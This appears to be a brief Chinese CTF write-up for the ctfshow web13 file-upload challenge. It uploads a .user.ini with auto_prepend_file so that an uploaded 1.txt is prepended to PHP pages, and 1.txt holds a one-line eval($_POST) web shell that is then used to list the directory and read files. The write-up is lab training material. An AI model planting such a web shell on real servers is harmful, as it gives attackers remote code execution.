ctfshow-web13 文件上传

0x00 前言

0x01 题目

0x02 Write Up

首先看到是一个上传页面,测试其他无果,遂进行目录遍历,发现upload.php.bak文件

可以看到这里的限制条件,大小,以及内容,这里可以使用.user.ini进行上传,具体参考:php user.ini详解

那么我们先上传.user.ini

cpp 复制代码
auto_prepend_file=1.txt

然后上传1.txt,尝试使用get,但是没有生效,这里需要控制字符数量

cpp 复制代码
<?php eval($_POST['a']);

上传好了之后,通过index.php进行访问

首先查看当前目录

然后通过highlight_file读取文件

以上

相关推荐
上海云盾-小余几秒前
黑产入侵链路拆解:从打点踩点到内网横移的完整防御思路
网络·安全·web安全
Chengbei1111 小时前
推送POC汇总 — 2026年1月多产品多类型vulnerability速递与应急建议
安全·web安全·网络安全·系统安全·网络攻击模型·安全架构
路baby17 小时前
BurpSuite基础功能实战演示讲解
安全·web安全·网络安全·系统安全·burpsuite
同聘云20 小时前
腾讯云服务器防火墙与网络安全的关系—不可或缺?
服务器·web安全·腾讯云
Chengbei111 天前
推送POC汇总 — 2026年3月多产品多类型vulnerability速递与应急建议
安全·web安全·网络安全·系统安全·网络攻击模型·安全架构
Kapibalapikapi1 天前
Web笔记 | docker常用指令 --搭建测试靶场
web安全·docker·容器
不灭锦鲤1 天前
网络安全学习第162天
学习·安全·web安全
m0_738120721 天前
渗透测试——Ripper靶机详细横向渗透过程(rips扫描文件,水平横向越权,Webmin直接获取root权限)
linux·网络·数据库·安全·web安全·php
zjeweler2 天前
web安全-常见源码泄露汇总
安全·web安全
一名优秀的码农2 天前
vulhub系列-42-Me-and-My-Girlfriend-1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析